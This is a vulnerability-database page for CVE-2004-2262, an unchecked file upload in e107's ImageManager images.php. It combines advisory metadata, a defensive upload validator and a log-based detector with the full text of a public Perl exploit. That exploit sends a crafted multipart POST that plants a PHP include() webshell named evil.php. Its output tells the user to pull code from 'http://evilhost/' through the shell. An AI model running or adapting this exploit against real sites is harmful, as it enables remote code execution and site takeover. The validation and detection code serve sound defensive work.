CVE-2004-2262
CVSS5.0
Published: 2004-12-31 00:00:00
Revised: 2008-09-10 15:33:22

[Original] ImageManager in e107 before 0.617 does not properly check the types of uploaded files, which allows remote attackers to execute arbitrary code by uploading a PHP file via the upload parameter to images.php.


[CNNVD] E107 Image Manager Unauthorized File Upload Vulnerability (CNNVD-200412-202)

ImageManager in e107 versions before 0.617 does not properly check the type of uploaded files; a remote attacker can execute arbitrary code by uploading a PHP file through the upload parameter of images.php.
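The root cause described above is an upload handler that trusts the client-supplied filename and never looks at the file's contents, so a `.php` file lands in a web-served `images/` directory. The following is an added example (not code from e107 or from this advisory) of the checks such a handler should apply: an extension allowlist, rejection of interpreter extensions anywhere in the name (double extensions such as `evil.php.gif`), a magic-byte check that the bytes really are the claimed image type, and a server-generated storage name so the client never controls what is written to disk. All names, sample bytes and the `storage_name` helper are assumptions made for this example.

```python
import os
import re
import secrets

# Extensions the application is willing to store and serve back as images.
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}

# Leading bytes ("magic numbers") expected for each allowed type.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

# Extensions a web server may hand to an interpreter. They are refused at any
# position in the name, so "evil.php" and "evil.php.gif" are both rejected.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl"}

# Conservative character set for the client-supplied name; rejects NUL bytes,
# path separators and anything else that could confuse a downstream component.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")


def validate_image_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for one uploaded file.

    The decision is based on the file's extension AND its content; the
    client-supplied name is only used for the extension check.
    """
    # Drop any directory component the client may have sent (e.g. "../x.png").
    base = os.path.basename(filename.replace("\\", "/"))
    if not SAFE_NAME.fullmatch(base):
        return False, "unsafe characters in filename"

    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"

    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' not allowed"
    if any(p in EXECUTABLE_EXTENSIONS for p in parts[1:]):
        return False, "executable extension in filename"

    # The content must match the type the extension claims.
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Server-chosen file name: random token plus the validated extension.

    The client never influences the stored name, so it cannot pick a name
    the web server would execute.
    """
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension must be validated first")
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample inputs: a real-looking GIF header and a PHP stub.
    gif = b"GIF89a\x01\x00\x01\x00" + b"\x00" * 8
    php = b"<?php echo 'constructed sample'; ?>"
    for name, blob in [("photo.gif", gif), ("evil.php", php),
                       ("evil.php.gif", gif), ("photo.gif", php)]:
        print(name, validate_image_upload(name, blob))
```

Storing the file under `storage_name(ext)` in a directory that the web server is configured not to execute scripts from (or outside the document root entirely, served through a read-only handler) removes the remaining risk even if a later check is bypassed.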

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [No impact on system confidentiality]
Integrity impact: PARTIAL [May allow system files to be modified]
Availability impact: NONE [No impact on system availability]
Attack complexity: LOW [No access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [No authentication required for exploitation]

- CPE (Affected Platforms and Products)

cpe:/a:e107:e107:0.616
cpe:/a:e107:e107:0.554
cpe:/a:e107:e107:0.615
cpe:/a:e107:e107:0.614
cpe:/a:e107:e107:0.611
cpe:/a:e107:e107:0.610
cpe:/a:e107:e107:0.545
cpe:/a:e107:e107:0.613
cpe:/a:e107:e107:0.612
cpe:/a:e107:e107:0.615a
cpe:/a:e107:e107:0.603
cpe:/a:e107:e107:0.555_beta

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2262
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2262
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-202
(Official data source) CNNVD

- Other Links and Resources

http://e107.org/comment.php?comment.news.672
(PATCH)  MISC  http://e107.org/comment.php?comment.news.672
http://xforce.iss.net/xforce/xfdb/18670
(UNKNOWN)  XF  e107-images-file-upload(18670)
http://www.securityfocus.com/bid/12111
(UNKNOWN)  BID  12111
http://www.osvdb.org/12586
(UNKNOWN)  OSVDB  12586
http://securitytracker.com/id?1012657
(UNKNOWN)  SECTRACK  1012657
http://secunia.com/advisories/13657
(VENDOR_ADVISORY)  SECUNIA  13657
http://milw0rm.com/exploits/704
(UNKNOWN)  MILW0RM  704

- Vulnerability Information

E107 Image Manager Unauthorized File Upload Vulnerability
Medium risk  Input validation
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
ImageManager in e107 versions before 0.617 does not properly check the type of uploaded files; a remote attacker can execute arbitrary code by uploading a PHP file through the upload parameter of images.php.

- Advisories and Patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability Information (704)

e107 include() Remote Exploit (EDBID:704)
php webapps
2004-12-22 Verified
80 sysbug
N/A
####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _ \ \ /\ / /
# |  _| | | (_) \ V  V /
# |_|   |_|\___/ \_/\_/
#      Security Group.
#
#                    -=[ e107 remote sploit ]=-                           
#                           by sysbug 
#                              
# Attack method:                                                               
# with this sploit u can send an include() vuln to a Host victim  
# the upload go to /images/evil.php
#                                                                
# C:\Perl\bin>perl sploit.pl www.site.com                          
# -=[ e107 remote sploit ]=-                                      
#         by sysbug 
# # www.site.com
# # OWNED OH YEAH!                                                
# # get your evilc0de in:                                          
# # www.site.com/images/evil.php?owned=http://evilhost/ 
# C:\Perl\bin>                                                     
# 
# credits: ALL MY FRIENDS!                                                                 
# HELP ? RTFM -> perl sploit.pl                                                                
#####################################################################
use IO::Socket;

if(@ARGV < 1){
usage();
exit;
}
main();

sub main(){

print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
$host[0] = $ARGV[0];
if($host[0] =~ /\//){
($host[1],$host[2])=split(/\//,$host[0]);
$host[0] =~ /\/(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]\n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die "  s0k off\n";
print $socket "POST $path HTTP/1.1\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n";
print $socket "Accept-Language: pt\r\n";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n";
print $socket "Accept-Encoding: gzip, deflate\r\n";
print $socket "User-Agent: l33t br0ws3r\r\n";
print $socket "Host: $host[1]\r\n";
print $socket "Content-Length: 1646\r\n";
print $socket "Connection: Keep-Alive\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n";
print $socket "/\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n";
print $socket "Content-Type: application/octet-stream\r\n\r\n";
print $socket "<? include(\$owned); ?>\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n";
print $socket "baseline\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n";
print $socket "on\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "Refresh\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "OK\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n";
print $socket "Cancel\r\n";
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser<\/title>/){
print "# OWNED OH YEAH!\n";
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
print "# usage: perl $0 <host> \n";
}

# milw0rm.com [2004-12-22]

- Vulnerability Information

12586
e107 images.php Arbitrary File Upload
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability Description

e107 contains a flaw that may allow a malicious user to upload arbitrary files. The issue is triggered when a malicious user submits images with arbitrary file extensions via the Image Manager in images.php. It is possible that the flaw may allow a malicious user to upload PHP files into the web root resulting in a loss of integrity.
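Because the file is written into a web-served `images/` directory, the abuse leaves a recognisable trace in the web server's access log: a POST to the ImageManager `images.php` endpoint followed, usually from the same client, by a request for a `.php` file under `/images/`. The code below is an added detection example (not part of this advisory, the OSVDB entry, or e107) that parses Apache/nginx-style combined log lines and raises an alert for each of those two events, tagging the second one more severely when the same client was already seen uploading. The log lines, IP addresses and file names are constructed for this example; the handler path is the one used by the public exploit above.

```python
import re

# Apache/nginx "combined"-style access log line (remote host, timestamp,
# request line, status, size). Referer and user agent are ignored here.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The vulnerable upload endpoint, under either handler directory name.
UPLOAD_ENDPOINT = re.compile(r"/htmlarea/popups/ImageManager/images\.php$", re.I)

# A server-side script being requested from the image directory.
SCRIPT_IN_IMAGES = re.compile(r"^/images/[^?]*\.(php\d?|phtml|phar)(\?.*)?$", re.I)


def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect_upload_abuse(lines):
    """Return a list of alert dicts for ImageManager upload abuse patterns.

    Rules:
      image-manager-post            POST to the ImageManager upload endpoint
      script-in-images              GET of a .php-like file under /images/
      script-in-images-after-upload same, from a client already seen posting
    """
    alerts = []
    uploaders = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path_only = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and UPLOAD_ENDPOINT.search(path_only):
            uploaders.add(rec["ip"])
            alerts.append({"rule": "image-manager-post", "ip": rec["ip"],
                           "ts": rec["ts"], "path": rec["path"]})
        elif rec["method"] == "GET" and SCRIPT_IN_IMAGES.match(rec["path"]):
            rule = ("script-in-images-after-upload" if rec["ip"] in uploaders
                    else "script-in-images")
            alerts.append({"rule": rule, "ip": rec["ip"],
                           "ts": rec["ts"], "path": rec["path"]})
    return alerts


# Constructed sample log: one client uploads and then fetches the script,
# another client only fetches ordinary images.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Dec/2004:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.7 - - [22/Dec/2004:10:00:05 +0000] "POST /e107_handlers/htmlarea/popups/ImageManager/images.php HTTP/1.1" 200 1830
203.0.113.7 - - [22/Dec/2004:10:00:09 +0000] "GET /images/evil.php?owned=http://198.51.100.9/ HTTP/1.1" 200 212
198.51.100.20 - - [22/Dec/2004:10:01:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 3401
198.51.100.20 - - [22/Dec/2004:10:02:00 +0000] "GET /images/photo.jpg HTTP/1.1" 304 -
""".splitlines()


if __name__ == "__main__":
    for alert in detect_upload_abuse(SAMPLE_LOG):
        print(alert)
```

The `script-in-images` rule on its own is worth keeping even without a preceding POST: on a correctly configured server nothing under `/images/` should ever be a script, so any hit is either a misconfiguration or an upload that arrived by some route this log does not show.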

- Timeline

2004-12-26 2004-12-23
2004-12-23 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author
